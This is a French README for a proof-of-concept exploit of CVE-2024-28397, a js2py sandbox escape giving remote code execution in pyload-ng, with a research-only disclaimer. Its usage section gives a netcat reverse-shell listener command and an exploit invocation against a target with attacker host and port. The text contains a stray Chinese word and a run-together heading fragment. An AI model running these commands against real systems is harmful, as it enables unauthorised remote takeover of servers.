
Exploit PoC pour CVE-2024-28397 – Exécution de code à distance dans pyload-ng via évasion du sandbox js2py
Ce dépôt contient un exploit de preuve de概念 (PoC) pour CVE-2024-28397, une vulnérabilité d'exécution de code à distance affectant pyload-ng en raison d'une utilisation non sécurisée de js2py.
Avertissement:
Ce PoC est uniquement destiné à des fins éducatives et de recherche.
Ne l'utilisez pas sur des systèmes qui ne vous appartiennent pas ou pour lesquels vous n'avez pas d'autorisation explicite de test.
L'auteur n'est pas responsable de toute utilisation abusive de ce code.
js2py dans pyload-ngVous aurez besoin de Python 3.x, de la bibliothèque requests et de netcat pour récupérer le reverse shell.
nc -lvnp 4444
python3 exploit.py -url http://target.com -lhost YOUR_IP -lport 4444 -user attacker -passwd attacker123